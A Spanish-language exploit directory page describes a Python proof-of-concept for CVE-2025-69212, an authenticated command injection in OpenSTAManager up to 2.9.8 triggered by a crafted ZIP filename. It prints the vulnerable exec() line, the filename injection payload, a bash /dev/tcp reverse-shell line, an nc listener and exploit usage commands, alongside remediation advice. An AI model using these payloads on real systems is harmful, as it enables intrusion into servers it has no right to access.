Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-69212 — PoC en Python, exploit para CVE-2025-69212 | Kitploit
Herramientas/GitHubGitHub/c0gnit00/cve-2026-69212
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

PoC en Python, exploit para CVE-2025-69212

Ver Repositorio
2hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69212 — Inyección de comandos del sistema operativo en OpenSTAManager (RCE)

Prueba de concepto del exploit para CVE-2025-69212, una vulnerabilidad de inyección de comandos del sistema operativo en OpenSTAManager <= 2.9.8 que permite a un atacante autenticado lograr la ejecución remota de código mediante la carga de un archivo ZIP manipulado.

Aviso

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • Versiones afectadas: OpenSTAManager <= 2.9.8
  • Corregido en: OpenSTAManager 2.9.9+
  • CVSS: Crítico

Detalles de la vulnerabilidad

La vulnerabilidad existe en src/Util/XML.php en la línea ~100, donde la aplicación pasa un nombre de archivo controlado por el usuario directamente a una llamada exec() del shell sin sanitización:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

Cuando se carga un archivo ZIP a través del plugin importFE_ZIP (/actions.php), la aplicación extrae el ZIP y pasa el nombre de archivo de cada entrada .p7m a exec(). Un atacante puede crear un ZIP con un nombre de archivo malicioso que salga del argumento entre comillas dobles e inyecte comandos arbitrarios del shell.

Payload de inyección (nombre de archivo):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

Ejecución resultante en el shell:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ inyectado aquí

Nota: La barra diagonal / no puede aparecer directamente en el nombre del archivo porque ZipArchive::extractTo() la trata como un separador de rutas. El PoC evita esto codificando en base64 el payload de la reverse shell.


Requisitos

  • Python 3.x
  • Biblioteca requests
  • Credenciales válidas de OpenSTAManager (cualquier rol con acceso al plugin de importación)
  • Un listener en la máquina del atacante (p. ej. nc)

Instalar dependencias:

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

Opciones

Ejemplo

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Ejecutar el exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Enrutar a través de Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

Cómo funciona

  1. Autenticación — Inicia sesión en OpenSTAManager con las credenciales proporcionadas
  2. Construcción del payload — Crea un archivo ZIP que contiene un archivo .p7m cuyo nombre incluye el comando inyectado
  3. Codificación en base64 — La reverse shell (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) se codifica en base64 para evitar barras diagonales en el nombre del archivo
  4. Carga — Envía por POST el ZIP a /actions.php mediante el plugin importFE_ZIP
  5. Ejecución — El servidor extrae el ZIP, pasa el nombre de archivo malicioso a exec(), lo que desencadena la reverse shell
  6. Subprocesos — La carga se ejecuta en un hilo daemon porque bash mantiene abierta la conexión HTTP; el script finaliza limpiamente sin esperar una respuesta

Remediación

Actualice a OpenSTAManager 2.9.9 o posterior, que sanea los nombres de archivo antes de pasarlos a los comandos del shell.

Si no es posible aplicar el parche de inmediato, desactive el plugin importFE_ZIP o restrinja el acceso a /actions.php solo a usuarios de confianza.


Aviso legal

Esta herramienta está destinada exclusivamente a pruebas de seguridad autorizadas y fines educativos. Úsela únicamente en sistemas que le pertenezcan o para los que tenga permiso explícito por escrito. El uso no autorizado contra sistemas que no le pertenecen es ilegal y poco ético. El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta.


Referencias

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
Descargar herramienta
ArgumentoObligatorioDescripción
-u, --urlSíURL base del objetivo (p. ej. http://target.htb)
-U, --usernameSíNombre de usuario de OpenSTAManager
-P, --passwordSíContraseña de OpenSTAManager
--lhostSíDirección IP para la reverse shell
--lportSíPuerto de escucha para la reverse shell
--proxyNoProxy HTTP (p. ej. http://127.0.0.1:8080)